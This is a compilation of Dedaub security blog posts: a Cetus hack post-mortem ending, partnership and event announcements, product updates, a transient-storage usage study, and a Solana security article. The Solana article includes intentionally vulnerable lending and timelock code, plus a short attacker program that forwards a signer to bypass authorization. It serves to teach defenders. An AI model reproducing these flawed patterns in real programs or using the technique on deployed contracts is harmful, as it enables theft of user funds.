    It is really unfortunate that when the team ported the code to SUI a couple of months later (Sui always supported 256-bit integers), a bug was introduced in checked_shlw. Audits to this version of the AMM by Ottersec and MoveBit do not find this issue. A subsequent audit by Zellic in April 2025 found no issues beyond informational findings. It is possible that library code performing numerical calculations were out of scope and moreover, since 256-bit operations are natively supported, issues like these could have been overlooked.

    Lessons for Developers

    1. Understand Your Language’s Integer Semantics

    • Know which operations abort and which silently overflow
    • Pay special attention to bit shift operations
    • Test your overflow checks with actual overflow conditions

    2. Mathematical Rigor is Non-Negotiable

    • DeFi protocols need to handle extreme values by design
    • The bounds of every mathematical operation need to be clearly understood
    • Consider using formal methods for verifying critical calculations (our team can assist)

    3. Test Edge Cases Exhaustively

    • Maximum values aren’t theoretical – they’re attack vectors
    • Combine multiple edge cases

    4. Audit Fixes, Not Just Changes

    • Consider independent verification of critical fixes

    5. Domain Expertise Matters

    • AMM mathematics involves complex invariants
    • Work with auditors who understand DeFi edge cases

    In DeFi, edge cases aren’t edge cases – they’re attack vectors. AMMs are particularly vulnerable as they involve complex mathematical operations across extreme ranges. The Cetus hack demonstrates that even “checked” operations require careful verification.

    Conclusion

    The Cetus hack serves as a stark reminder that security in DeFi is hard, but not impossible to achieve. A single flawed overflow check, combined with the composability of flash loans and concentrated liquidity mechanics, enabled the theft of over $200 million.

    For developers building on Move-based chains like Sui and Aptos, this incident underscores the importance of understanding your language’s integer semantics, rigorously testing edge cases, and working with auditors who deeply understand both the platform and the DeFi domain.

    Contact us at Dedaub if you need help securing your Aptos or Sui Network project – our team specializes in the mathematical complexities and edge cases that come up in complex DeFi protocols.

  • Dedaub Partners with Immunefi to Bring Native Firewall Capabilities to Magnus

    Dedaub Partners with Immunefi to Bring Native Firewall Capabilities to Magnus

    Dedaub Partners with Immunefi to Bring Native Firewall Capabilities to Magnus

    Dedaub has joined forces with Immunefi to develop an onchain firewall for the Magnus platform. This partnership brings together two leading teams in web3 security with a shared mission to improve smart contract resilience by building a system that can detect and block malicious transactions before they execute onchain.

    “We’re excited to work with Immunefi — a team we’ve long respected for their impact in the space. Together, we’re developing a runtime firewall within Magnus — the single pane of glass for onchain SecOps — to advance web3 security through real-time threat prevention.” — Neville Grech, Co-founder of Dedaub.

    Magnus: Your Onchain Security Command Center

    Immunefi Magnus offers a single interface for protocols to manage audits, bug bounties, monitoring, firewalling, and incident response. With Magnus, web3 security teams operate from an end-to-end platform that streamlines operations, avoids the pitfalls of siloed tools, and enables teams to layer on protection as needed.

    • One platform for audits, bounties, monitoring, firewalling, and more
    • Integrated, top-tier tools across every layer of defense
    • Supercharged CI/CD pipelines with built-in security at every stage
    • Automated threat detection and response with AI-powered workflows

    With Dedaub onboard, Magnus draws on our long-standing expertise in smart contract analysis, decompilation, and runtime monitoring.

    “We built Magnus to unify the fragmented world of Web3 security. Partnering with Dedaub allows us to bring even deeper threat prevention capabilities into that vision — enabling protocols to move from reactive defense to real-time protection.” — Mitchell Amador, CEO of Immunefi.

    To follow the progress of our collaboration with Immunefi and explore how we’re evolving security at the execution layer, sign up for Magnus early access here 

  • From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

    From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

     Ethereum Developers on Solana

    Solana stands out as one of the most popular blockchains, known for its high throughput and scalability that position it as an attractive alternative to Ethereum. These benefits arise from Solana’s distinctive architecture, which is markedly different from Ethereum’s design. While these architectural differences underlie many of Solana’s strengths, they also introduce unique risks that may be unfamiliar to developers transitioning from Ethereum. In this article, we will explore some common errors that Ethereum developers might make when building Solana programs, given the vastly different security models of the two platforms.

    Proper Account Validation

    State in Ethereum is tightly associated with the smart contract code that controls it. Each contract on Ethereum has a unique storage space that cannot be written to by any other contract. Solana takes a very different approach, separating executable code, called programs, from other types of accounts. This introduces an additional complexity, which can easily be overlooked by Ethereum developers: account validation.

    On Solana, users must provide all the accounts on which a program operates. This means that if the program does not enforce the appropriate constraints and validations, a malicious user may inject unexpected accounts, which could lead to critical vulnerabilities. Specifically, all accounts should be checked for correct ownership, correct type, correct address if a specific account is expected, and correct relations with other accounts expected by the program. All of these validations are made simpler using the Anchor framework. However, missed checks and validations are still possible even when leveraging these tools, especially when using remaining_accounts, on which Anchor imposes no checks. For example, consider the following snippet from a simple lending program:

    
    pub fn liquidate_collateral(ctx: Context<LiquidateCollateral>) -> Result<()> {
        let borrower = &mut ctx.accounts.borrower;
        let collateral = &mut ctx.accounts.collateral;
        let liquidator = &mut ctx.accounts.liquidator;
    
        let collateral_in_usd = get_value_in_usd(collateral.amount, collateral.mint);
        let borrowed_amount_in_usd = get_value_in_usd(borrower.borrowed_amount, borrower.mint);
    
        if collateral_in_usd * 100 < borrowed_amount_in_usd * 150 {
            withdraw_from(liquidator, borrower.borrowed_amount);
            transfer_collateral_to_liquidator(ctx);
            let liquidated_amount = collateral.amount;
    
            borrower.borrowed_amount = 0;
            msg!(
                "Liquidated {} collateral tokens due to insufficient collateralisation.",
                liquidated_amount
            );
        } else {
            msg!("Collateralisation ratio is sufficient; no liquidation performed.");
        }
        Ok(())
    }
    
    
    #[derive(Accounts)]
    pub struct LiquidateCollateral<'info> {
        #[account(mut)]
        pub borrower: Account<'info, BorrowerAccount>,
    
        #[account(mut)]
        pub collateral: Account<'info, TokenAccount>,
    
        #[account(mut)]
        pub liquidator: Account<'info, TokenAccount>,
    
        /// CHECK: signer PDA for collateral account
        pub collateral_signer: UncheckedAccount<'info>,
    
        pub token_program: Program<'info, Token>,
    }
    

    This function simply checks the collateralisation ratio of a loan and performs liquidation if the ratio is below 1.5. A similar program on Ethereum would likely store collateral data in a mapping, whether in the same contract or a different one. This would require the contract developer to explicitly specify a key for the mapping. However, on Solana, it is the user that chooses the account as opposed to the developer.

    Hence, while at first glance this may seem secure coming from Ethereum, the instruction handler is missing a crucial check. In-built Anchor checks ensure that all accounts are of the correct type and have the correct owner, however, there is no check that ensures the collateral account provided is associated with the borrower provided. This means an attacker could provide an arbitrary borrower account and the collateral account of a different borrower. This effectively allows the attacker to liquidate any collateral account, regardless of its collateralisation ratio, by finding (or creating) a borrower account that is just below the required ratio.

    This example demonstrates the dangers of insufficient account validation, especially transitioning from Ethereum development, where such validations do not exist. While Ethereum’s model tightly couples state with the source code, limiting potential interference from external actors, Solana’s separation of executable programs and accounts demands that developers take extra precautions. On Solana, every account passed into a program must be meticulously checked for proper ownership, type, and expected relationships.

    Signer Account Forwarding

    On Ethereum, authorisation is quite straightforward. The global variable msg.sender can be used to securely determine the immediate caller to the function, which is often enough to authorise privileged actions. On Solana, a similar approach can be employed, leveraging signer accounts.

    Signer accounts in Solana serve as the entities that have provided a valid signature for a transaction, confirming their intent and authority to perform an action. These accounts can either be traditional user keypairs, where a private key directly authorises actions, or Program Derived Addresses (PDAs). PDAs are account addresses deterministically generated from a set of seeds and a program ID. Unlike keypairs, PDAs do not have a private key. Only the program from which the PDA is defined can mark a PDA as a signer account using the invoke_signed function.

    Unlike msg.sender, a signer account does not securely determine the immediate caller. Programs in Solana are allowed to invoke other programs with the same signer accounts they themselves were invoked with, effectively forwarding signer accounts.

    Solana program can call other programs through CPI (Cross-Program Invocation). There are two ways to perform CPI: invoke and invoke_signed. As mentioned earlier, invoke_signed is used to mark a PDA account (which must be derived from the calling program) as a signer for the CPI. The invoke function on the other hand, does not add any signers. Both functions can forward signer accounts that are already marked as signers.

    Hence, when a user or program provides a signer account, they are essentially entrusting downstream programs with a piece of verified authority. The vulnerability emerges when this trust is misplaced. If an untrusted program is invoked with a signer account that possesses sensitive privileges, it can forward this signer with arbitrary arguments to exploit these privileges. For instance, an attacker might leverage this oversight to perform operations on behalf of an unsuspecting user.

    Programs are especially at risk when performing a signed CPI on a program that can be determined or influenced by the user. A malicious user may intentionally direct the CPI to a malicious program, effectively hijacking the signer account to impersonate the vulnerable program. The severity of the issue could be even further elevated if the CPI allows the user to specify remaining_accounts to increase the flexibility of the call. While this significantly increases the flexibility and composability of Solana programs for legitimate users, it also carries additional risks. An attacker exploiting insecure signature handling may be able to leverage these remaining_accounts to include any required additional accounts that are necessary to make a privileged call.

    Consider the below timelock program:

    /// Queue an arbitrary task with a specified delay.
    /// The caller provides the target program, instruction data (task_data), 
    /// and a delay (in seconds) that determines when the task can be executed.
    
    pub fn queue_task(
        ctx: Context<QueueTask>, 
        task_data: Vec<u8>, 
        target_program: Pubkey, 
        delay: i64
    ) -> ProgramResult {
    
        let task = &mut ctx.accounts.task;
    
        // Get the current unix timestamp
        let clock = Clock::get()?;
    
        task.release_time = clock.unix_timestamp + delay;  // set execution time to now + delay
        task.target_program = target_program; // target program to invoke on execute
        task.authority = *ctx.accounts.authority.key; // task creator stored for authorisation
    
        task.task_data = task_data; // arbitrary instruction data
    
        Ok(())
    }
    
    
    
    #[derive(Accounts)]
    pub struct QueueTask<'info> {
        #[account(
            init, 
            payer = authority, 
            space = 8 + Task::LEN,
        )]
    
        pub task: Account<'info, Task>,
    
        #[account(mut)]
        pub authority: Signer<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This program allows anyone to queue a task with an arbitrary delay, storing the creator of the task for authorisation purposes. The program and arguments are controlled by the creator. Now consider this program’s execute function:

    /// Execute the queued task.
    /// Anyone can call this instruction, but the task will only execute if the timelock has expired.
    
    pub fn execute_task(ctx: Context<ExecuteTask>) -> ProgramResult {
        let task = &ctx.accounts.task;
    
        // Ensure the timelock has passed
        let clock = Clock::get()?;
        if clock.unix_timestamp < task.release_time {
            return Err(ErrorCode::TimelockNotExpired.into());
        }
    
        let cpi_accounts: Vec<AccountMeta> = 
            std::iter::once(&ctx.accounts.task_authority).chain(
            ctx
            .remaining_accounts
            .iter()
            ).map(|acc| AccountMeta {
                pubkey: *acc.key,
                is_signer: acc.is_signer,
                is_writable: acc.is_writable,
            })
            .collect();
    
        let ix = Instruction {
            program_id: task.target_program,
            accounts: cpi_accounts,
            data: task.task_data.clone(),
        };
    
        invoke_signed(&ix, ctx.remaining_accounts, &[&[TIMELOCK_SIGNER]])?;
        Ok(())
    }
    
    #[derive(Accounts)]
    pub struct ExecuteTask<'info> {
        #[account(mut, close = authority)]
        pub task: Account<'info, Task>,
    
        #[account(address = task.authority)]
        pub task_authority: AccountInfo<'info>,
    
        /// This is only needed to receive the lamports from the closing account.
        #[account(mut)]
        pub authority: Signer<'info>,
    
        #[account(
            seeds = [TIMELOCK_SIGNER],
            bump
        )]
        pub timelock_signer: UncheckedAccount<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This execute function allows anyone to execute the task once the time has elapsed, with the original task creator being prepended to the accounts list for authorisation purposes. To an Ethereum developer, this may appear secure. However, under Solana’s security model, this program contains a critical error.

    The CPI in the execute_task function uses the same signer PDA for all tasks. This means a malicious task could misuse the signer to impersonate the timelock program. Suppose an attacker were to create the following program:

    #[program]
    pub mod malicious_program {
        use super::*;
        // This instruction forwards the signer account via CPI to the vulnerable program.
        // The vulnerable program then believes that the forwarded account legitimately signed.
        pub fn forward_signer(ctx: Context<ForwardSigner>) -> Result<()> {
            let accounts = vec![AccountMeta::new(ctx.accounts.user.key(), true)];
            let instruction_data: Vec<u8> = vec![]; // attacker controlled data
            let instruction = Instruction {
                program_id: ctx.accounts.target_program.key(),
                accounts,
                data: instruction_data,
            };
    
            invoke(&instruction, &[ctx.remaining_accounts])?;
            Ok(())
        }
    }
    
    #[derive(Accounts)]
    pub struct ForwardSigner<'info> {
        /// CHECK: This is the attacker's key as they created the malicious task
        pub ignored_task_creator: UncheckedAccount<'info>,
        /// CHECK: This is the target program's ID
        pub target_program: UncheckedAccount<'info>,
    }
    

    This program is designed to receive a CPI from the timelock program, strip away the task creator account that is intended for a vital security check and redirect the call (timelock signature intact) to a different program. If an unsuspecting program exposes a privileged function to the timelock, using the first account as authorisation, the attacker can exploit this. First, simply queue a task with minimal delay to this malicious program, then execute the task providing the target program, followed by the accounts list required for the target invocation. This CPI would be indistinguishable from a legitimate CPI from the timelock. Hence, the attacker can bypass the delay of any existing tasks in the timelock and potentially execute functions they are not authorised to execute.

    This example illustrates the dangers of misunderstanding Solana’s security model. In essence, mishandling signer accounts can transform a useful delegation mechanism into an exploitable backdoor, where an attacker could chain CPIs to bypass critical authorisation checks. The authority given to signer accounts should be carefully considered, and no single signer account should be used to authorise multiple actions.

    Ethereum Developers on Solana: Conclusion

    The transition from Ethereum to Solana requires certain security assumptions to be reconsidered. Inadequate account verification and unchecked signer account forwarding can open doors for exploitation. Developers must enforce strict ownership, type checks, relationship validations, and signer handling among accounts to mitigate risks. Embracing Solana’s distinct model calls for a careful and updated approach to program design, ensuring robust protection against vulnerabilities inherent in its architecture.


    Brought you by Dedaub, the home of the best EVM bytecode decompiler.

  • Dedaub at ETHDenver 2025 | Showcasing Real-Time Security Monitoring

    Dedaub at ETHDenver 2025 | Showcasing Real-Time Security Monitoring

    Dedaub is excited to sponsor ETHDenver once again! This year, we will showcase the Dedaub Security Suite‘s real-time monitoring capabilities. Our team is eager to discuss the latest Web3 vulnerabilities, audit best practices, and develop partnerships at ETHDenver 2025.

    ETHDenver 2025 | Stop by Booth #513

    Located near the Main Entrance | You Won’t Miss Us!

    Visit us at Booth #513, just a few steps from the main entrance, where our team will gladly guide you through our advanced monitoring and alerting tools at ETHDenver 2025. Discover how they provide three lines of defense in a single monitoring solution to proactively identify rug pulls, anomalies, and protocol breaches before they escalate.

    1st Line: Continuous Static Code Analysis

    • Detect 0 days in newly deployed code
    • Novel theorem-proving techniques introduced to reduce false positives

    2nd Line: Custom Monitoring Agents using DedaubQL

    • Fully customizable & highly expressive language for developing agents
    • Detects anomalous conditions in your protocol

    3rd Line: Suspicious Contract & Transaction Detection

    • Predicts whether your project is targeted for attack
    • Detects suspicious transactions
    ETHDenver 2025

    Post-Audit Protection: Why Continuous Monitoring is Essential

    For years, smart contract security has revolved around audits, bug bounty programs, and reactive responses to exploits. However, as DeFi and on-chain applications grow, post-deployment security is becoming increasingly critical. An audit is just the beginning—ongoing monitoring ensures that emerging threats are detected and addressed before they evolve into costly exploits. Join us at ETHDenver 2025 to learn more about this crucial process.

    Granular, Customizable Monitoring Agents on Demand 

    Dedaub’s monitoring system enables fully customizable agents by leveraging DedaubQL, a highly expressive and performant declarative language tailored for blockchain security monitoring. DedaubQL allows protocols to define and check invariants and adapt our threat detection algorithms to their particular logic and concerns.

    The execution model of DedaubQL ensures that monitoring agents operate continuously and with minimal delay, updating alerts in real-time as new blockchain data becomes available.

    By enabling protocols to construct custom agents that can detect anomalies specific to their architecture—such as liquidity imbalances, unexpected contract interactions, or unauthorized fund movements—Dedaub’s monitoring suite provides a fine-tuned, protocol-specific defense mechanism.

    About ETHDenver 2025

    ETHDenver 2025 will once again transform Denver into a global hotspot for blockchain innovation, continuing the momentum built in previous years. As a community-owned festival powered by SporkDAO, ETHDenver 2025 offers various activities— from workshops and technical talks to boot camps and networking parties—designed to spark creativity and collaboration.

  • Dedaub Security Suite Updates Q4-24

    Dedaub Security Suite Updates Q4-24

    FREE MONITORING for all!

    The Dedaub Security Suite continues to evolve with features designed to simplify blockchain transaction monitoring and security analysis. These new capabilities address Web3 challenges and empower developers, security professionals, and organizations to work more effectively. Here’s an overview of what’s new.


    Blockchain Transaction Monitoring Available to Free-Tier Users

    We are excited to offer all registered users free access to Blockchain Transaction Monitoring queries.

    With our free plan, users can set up monitoring bots or queries to track on-chain activities and trigger custom actions through webhooks. These tools allow users to flag unusual transactions or stay alert to specific on-chain events, empowering them to maintain vigilant oversight of their projects. Blockchain transaction monitoring is essential for this oversight.

    (For the free tier of the application, there are limits in how many queries can be running simultaneously, or generating alerts.)

    Login today and try it out. 


    Multi-Chain Monitoring Agents

    Monitoring agents are now network-agnostic, meaning they can track activities across multiple blockchains, like Ethereum and other EVM-compatible networks. Blockchain transaction monitoring across these networks is now more efficient.

    For example, a DeFi project that runs on Ethereum and Binance can now monitor high-value token transfers and detect suspicious behavior on both networks simultaneously. Updated macros make configuring these cross-chain queries easy, ensuring seamless and efficient monitoring.


    Public Function-Based Similarity

    Identifying patterns across contracts is now more straightforward. The Public Function-Based Similarity feature allows users to find contracts with similar functions to their target contract. This feature uses large language models (LLMs) to detect similarities.

    blockchain transaction monitoring |  Public Function-Based Similarity

    Enhanced Monitoring Editor

    The updated monitoring editor simplifies the query writing process, making it faster and more intuitive. The query language server now offers real-time suggestions, including table and macro names, helping users quickly identify the correct syntax and options for their monitoring requirements. Additionally, the revamped error reporting system accurately identifies issues in queries, such as undefined variables or incorrect filters, and provides actionable feedback to help users resolve these issues. This is especially useful for blockchain transaction monitoring queries.

    Dedaub Security Suite Updates | Enhanced Monitoring Editor

    Monitoring Star Rating System

    The Monitoring Star Rating System within the Dedaub Security Suite allows users to quickly provide feedback on monitoring queries. Using this star rating system to share their experiences, users contribute to a valuable library of insights that assist others in finding the right tools to meet their needs. This approach ensures the platform stays focused on practical, real-world use cases.

    Dedaub Security Suite Updates | Monitoring Star Rating System

    Blockchain Transaction Monitoring Folders for Organization

    The new monitoring folders feature allows users to systematically organize queries systematically, ensuring better clarity and accessibility within the Dedaub Security Suite. Users can navigate their query library quickly and maintain a cleaner workspace by categorizing queries into dedicated folders for better blockchain transaction monitoring.


    Advanced RPC Fetch Functions

    The latest Dedaub Security Suite introduces advanced monitoring capabilities that support external REST API requests. Five new functions allow users to incorporate data from external sources directly into their monitoring queries. The system supports HTTP GET, POST, and PUT requests.

    Advanced RPC Fetch Functions

    Results from the requests can be joined against results from other tables. 

    In total, there are 5 new functions:

    • http_get() for all GET requests
    • http_get_json() for GET requests that return json strings
    • http_get_json_array() for GET requests that return json arrays
    • http_post() for POST requests
    • http_put() for PUT requests

    Cross-Chain Contract Lists

    With the new cross-chain contract lists feature, users can manage contract data spanning multiple blockchain networks in one unified list. For instance, users can create a single list to monitor contracts deployed on Ethereum and other EVM-compatible networks. This helps streamline blockchain transaction monitoring across networks.


    Annotate and Share Transaction Traces

    Transaction traces now support annotations, making it easier to interpret complex data. Users can add custom highlights and aliases to addresses and share these annotated traces with their team for collaborative analysis.

    Annotate and Share Transaction Traces | blockchain transaction monitoring

    Blockchain Monitoring + contract lists = ♥️

    Users can now incorporate contract lists into their monitoring query.


    Improved Gnosis Proxy Support

    We’ve added better support for Gnosis proxies to our Security Suite! You can now interact with the proxy using the underlying implementation ABI.

    Improved Gnosis Proxy Support | monitoring blockchain transactions

    Advanced Code View

    Play around with our new advanced code view in the decompiler and projects! The new code view allows multiple code representations to open concurrently in a split panel, with the ability to synchronize the two in some cases.

    Advanced Code View | monitoring blockchain transactions

    Previous Security Suite Suite Updates

  • Dedaub at DeFi Security Summit 2024

    Dedaub at DeFi Security Summit 2024

    DSS 2024 | Dedaub is sponsoring the DeFi Security Summit 2024 in Bangkok, Nov 7-9! 🎉 We're contributing to sessions on secure development and using LLMs for smart contract analysis. Follow @summit_defi for the latest updates.

    Dedaub is proud to sponsor the DeFi Security Summit (DSS) 2024, which will be held from November 7th to 9th in Bangkok. The summit aims to enhance the security of smart contracts in decentralized finance. This sponsorship reflects our commitment to bolstering Web3 by elevating blockchain security standards and promoting collaboration within the ecosystem.

    In the 2024 edition, we’re contributing to two key sessions:

    1. SEAL Panel: “Safer Development: Don’t Get Rekt”

    This panel will cover best practices for secure development, with insights from top security leaders. Gain practical strategies to avoid common pitfalls in smart contract development.

    2. “Smart Contracts to Embeddings: Using Off-the-Shelf LLMs for Fun and Profit”

    Dedaub will demonstrate how Large Language Models (LLMs) can improve smart contract analysis, providing developers with new tools to understand and enhance contract security.

    DSS 2024 | About DeFi Security Summit

    The DeFi Security Summit (DSS) is an annual, marketing-free event dedicated to advancing the security of decentralized finance (DeFi) applications and blockchain-based technology. Inspired by renowned security conferences like CCC and Defcon, DSS is a platform for white-hat hackers, protocol builders, security researchers, and tool providers to collaborate and share insights. The summit focuses on education, technical advancements, and best practices to secure blockchain applications’ on-chain and off-chain components. DSS 2024 will be the third edition, building on the success of previous years. For more info, visit https://defisecuritysummit.org/.

    About Dedaub 

    Dedaub is a pioneer in Smart Contract security technology and auditing. We blend cutting-edge program analysis with real-world white-hat hacking. As a founding collaborator of the SEAL 911 initiative, we contribute to emergency response frameworks within the blockchain ecosystem. Trusted by leading protocols, Dedaub is the security partner for Oasis Protocol Sapphire and collaborates with the Chainlink BUILD program. Our role on the ZKSync Security Council and as a security advisor to Arbitrum DAO emphasizes our commitment to safeguarding major Web3 projects.

  • Transient Storage in the wild: An impact study on EIP-1153

    Transient Storage in the wild: An impact study on EIP-1153

    With the recent introduction of transient storage in Ethereum, the landscape of state management within the Ethereum Virtual Machine (EVM) has evolved once again. This latest development has prompted us at Dedaub to take a fresh look at how data is stored and accessed in the EVM ecosystem, as well as analyze how the new transient storage is used in real-world applications.

    It’s important to note that even though transient storage has properly been integrated into the EVM, the transient modifier is still not yet available in Solidity. Therefore, all usage of transient storage is directly from the TSTORE and TLOAD opcodes using inline assembly, meaning usage is not that widespread yet, and could also be at a higher risk of vulnerability.

    📢 Actually as of 9th October 2024, with the introduction of solc 0.8.28, Transient storage is fully supported! This does not invalidate any of the content in this article, but please consider this article was written at Ethereum Block Number 20129223.

    In this comprehensive blog post, we will explore the strengths and limitations of each storage type. We will discuss all their appropriate use cases, and examine how the introduction of transient storage fits into the broader ecosystem of EVM data management. If you do not need a refresher of how the EVM manages state, feel free to skip to the EIP-1153 impact analysis section.

    EIP-1153 | Quick refresher of data storage and access

    Storage

    Storage in Ethereum refers to the persistent storage a contract holds. This storage is split into 32 byte slots, with each slot having its own address ranging from 0 to 2256 – 1. In total, that means a contract could store potentially up to 2261 bytes.

    Of course, the EVM doesn’t track all of the bytes simultaneously. Instead, it’s treated more like a map—if a specific storage slot needs to be used, it’s loaded similar to a map, where the key is its index and the value is the 32-bytes that are being stored or accessed.

    Starting with slot 0, (Solidity) will try to store static size values as compactly as possible, only moving to the next slot when the value cannot fit into the remaining space. Structs and fixed size arrays will also always start on a new slot and any following items will also start a new slot, but their values are still tightly packed.

    Here are the rules as stated by the Solidity docs:

    • The first item in a storage slot is stored lower-order aligned, meaning the data is stored in big endian form.
    • Value types use only as many bytes as are necessary to store them.
    • If a value type does not fit the remaining part of a storage slot, it will be stored in the next storage slot.
    • Structs and array data always start a new slot and their items are packed tightly according to these rules.
    • Items following struct or array data always start a new storage slot.

    However, for mappings and dynamically size arrays, there’s no guarantee on how much space they will take up, so they cannot be stored with the rest of the fixed size values.

    For dynamic arrays, the slot they would have taken up is replaced by the length of the array. Then, the rest of the array is stored like a fixed size array starting from the slot keccak256(s), where s is the original slot the array would have taken up. Dynamic arrays of arrays recursively follow this pattern, meaning an arr[0][0] would be located at keccak256(keccak256(s)), and where s is the slot the original array is stored at.

    For maps, the slot remains 0, and every key-value pair is stored at keccak256(pad(key) . s), where s is the original data slot of the mapping, .is concatenation, and the key is padded to 32 bytes if it’s a value type but not if it’s a string and byte array. This address stores the value for the corresponding key, following the same rules for other storage types.

    As an example, let’s look at a sample contract Storage.sol and view its storage:

    contract Storage {
        struct SomeData {
            uint128 x;
            uint128 y;
            bytes z;
        }
    
        bool[8] flags;
        uint160 time;
        
        string title;
        SomeData data;
        mapping(address => uint256) balances;
        mapping(address => SomeData) userDatas;
        
        // ...
    }
    
    | Name      | Type                                        | Slot | Offset | Bytes | Contract                |
    |-----------|---------------------------------------------|------|--------|-------|-------------------------|
    | flags     | bool[8]                                     | 0    | 0      | 32    | src/Storage.sol:Storage |
    | time      | uint160                                     | 1    | 0      | 20    | src/Storage.sol:Storage |
    | title     | string                                      | 2    | 0      | 32    | src/Storage.sol:Storage |
    | data      | struct Storage.SomeData                     | 3    | 0      | 64    | src/Storage.sol:Storage |
    | balances  | mapping(address => uint256)                 | 5    | 0      | 32    | src/Storage.sol:Storage |
    | userDatas | mapping(address => struct Storage.SomeData) | 6    | 0      | 32    | src/Storage.sol:Storage |
    

    All the defined values are stored starting from slot 0 in the order they are defined.

    1. First, the flags array takes up the entire first slot. Each bool only takes 1 byte to store, meaning the entire array takes 8 bytes total.
    2. The uint160 time is stored in the second slot. Even though it only takes 20 bytes to store, meaning it can fit in the remaining space of the first slot, it must start on the second slot since the first slot is storing an array.
    3. The string title takes up the entire third slot, since it is a dynamic data type. The slot stores the length of the string, and the actual characters of the string should be stored starting at keccak256(2).
    4. Next, the entire data struct takes up 2 slots. The first slot of the struct packs both the x and y uint128 values, since they each only take 16 bytes. Then, the second slot of the struct stores the dynamic bytes value.
    5. Finally, there are two mapping values, each taking up an empty slot to reserve their mapping. The actual mapping values would be stored at keccak(pad(key) . uint256(5)) or keccak(pad(key) . uint256(6)) respectively.

    Here’s a diagram visualizing the storage:

    EIP-1153

    If the title or z variable contain data that is longer than 31 bytes, they would instead be stored at keccak(s), as shown by the arrows. The mapping values are stored following the defined rules above for hashing the key.

    Finally, storage variables can also be declared as immutable or constant. These variables don’t change over the runtime of the contract, which saves on gas fees since their calculation can be optimized out. constant variables are defined at compile-time, and the Solidity compiler will replace them with their defined value during compilation. On the other hand, immutable variables can still be defined during construction of a contract. At this point the code will automatically replace all references to the value with the one that was defined.

    Memory

    Unlike storage, memory does not persist between transactions, and all memory values are discarded at the end of the call. Since memory reads have a fixed size of 32 bytes, it aligns every single new value to its own chunk. So while uint8[16] nums might only be one 32-byte word when stored in storage, it will take up sixteen 32-byte words in memory. The same splitting also happens to structs, regardless of how they are defined.

    For data types like bytes or strings, their variables need to be differentiated between memory pointers or storage pointers, using the memory or storage keyword respectively.

    Mappings and dynamic arrays do not exist in memory, since constantly resizing memory is very inefficient and expensive. Though you can allocate arrays with a fixed size using new <type>[](size), you cannot edit the sizes of these arrays like you can with storage arrays using .push and .pop .

    Finally, memory optimization is very important, since the gas cost for memory scales quadratically with size as memory expands, rather than linearly.

    Stack

    Like memory, stack data only exists for the current execution. The stack is very simple, being just a list of 32-byte elements that are stored sequentially one after another. It is modified using POP, PUSH, DUP, and SWAP instructions, much like stacks in standard executables. Currently, the stack only stores up to 1024 values.

    Most actual calculations are done on the stack. For example, arithmetic opcodes such as ADD or MUL pop two values from the stack, then push the result with the binary operation onto the stack.

    Calldata

    Calldata is similar to memory and stack data in that it only exists within the context of one function call. Like memory, all values must also be padded to 32 bytes. However, unlike memory, which is allocated during contract interactions, calldata stores the read-only arguments that are passed in from external sources, like an EOA or another smart contract. It is important to note that if you want to edit the values passed in from calldata, you must copy them to memory first.

    Calldata is passed in with the rest of the data during the transaction, so it must be packed properly according to the specified ABI of the function that is being called.

    Transient Storage

    Transient Storage is a fairly new addition to the EVM, with Solidity only supporting the opcodes starting 2024, with the proper language implementation expected to arrive in the near future. It is meant to serve as an efficient key-value mapping that exists during the context of an entire transaction, and its opcodes, TSTORE and TLOAD. It always takes 100 gas each, making it much more gas efficient than regular storage.

    The specialty of transient storage is that it persists through call contexts. This is perfect for scenarios like reentrancy guards that can set a flag in transient storage, then check if that flag has already been set throughout the context of an entire transaction. Then, at the end of the entire transaction, the guard will be wiped completely and can be used as normal in future transactions.

    Despite its transient nature, it is important to note that this storage is still part of the Ethereum state. As such, it must adhere to similar rules and constraints of those of regular storage. For instance, in a STATICCALL context, which prohibits state modifications, transient storage cannot be altered, meaning only the TLOAD opcode is allowed and not TSTORE.

    EIP-1153 impact analysis

    Since transient storage is a relatively recent feature we were able to be comprehensive in inspecting all cases of how it has been used as of Ethereum block number 20129223. We found that from the ~250 deployed contracts containing or having libraries containingTSTORE or TLOAD opcodes, there were ~180 unique source files, meaning over 60 of these deployed contracts were duplicates deployed cross-chain.

    Here is the recorded distribution of the usage of transient storage in these ~190 contracts:

    EIP-1153

    Out of the around 190 unique contracts on chain that use this feature, we were able to differentiate them into 6 general categories:

    1. First and foremost, over 50% of the usage of transient storage is on reentrancy guards. This makes sense, as reentrancy protection is the perfect use case for transient storage and is also very easy to implement, with a simple one possibly looking like:
    modifier ReentrancyGuard {
        assembly {
    		    // If the guard has been set, there is re-entrancy, so revert
            if tload(0) { revert(0, 0) } 
            // Otherwise, set the guard
            tstore(0, 1)
        }
        _;
        // Unlocks the guard, making the pattern composable.
        // After the function exits, it can be called again, even in the same transaction.
        assembly {
            tstore(0, 0)
        }
    }
    
    1. On the other hand, only 3.6% of the contracts used this pattern as an entrancy lock, locking the contract state between transactions to ensure that certain functions could only be called after calling other functions. Here’s a short example.
    // keccak256("entrancy.slot")
    uint256 constant ENTRANCY_SLOT = 0x53/*...*/15;
    
    function enter() {
        uint256 entrancy = 0;
        assembly {
            entrancy := tload(ENTRANCY_SLOT)
        }
        if (entrancy != 0) {
    				revert("Already entered");
        }
    
        entrancy = 1;
        assembly {
            tstore(ENTRANCY_SLOT, entrancy)
        }
    }
    
    function withdraw() {
        uint256 entrancy = 0;
        assembly {
            entrancy := tload(ENTRANCY_SLOT)
        }
    
        if (entrancy == 0) {
            revert("Not entered yet");
        }
    
        // ...
    }
    
    1. Next, around 6% of the contracts used transient storage to preserve contract context for callback functions or cross-chain transactions. This was mostly on Bridge contracts, like this one here.
    2. 8.3% of the contracts used transient storage to keep a temporary copy of the contract state to verify that certain actions are authorized. For example, this contract by OpenSea temporarily stores an authorized operator, specific tokens, and amounts related to those tokens to validate that all transfers happen as they should.
    3. A bit less than 9% of the contracts used transient storage for their own specialized purposes. For example, an airdropping contract utilizes tstore as a hashmap to track and manage eligible recipients within the transaction context.
    4. 20% of contracts although had no transient storage opcodes in the bytecode, contained functions that utilised transient storage in the referenced libraries. Most of these libraries are openzeppelin internals such as their implementation of ERC1967 (see StorageSlot).

    The introduction of transient storage marks a significant evolution in the EVM’s data management capabilities. Our analysis at Dedaub reveals that while it’s still in its early stages of adoption, transient storage is already making a notable impact, particularly in smart contract security and efficiency.

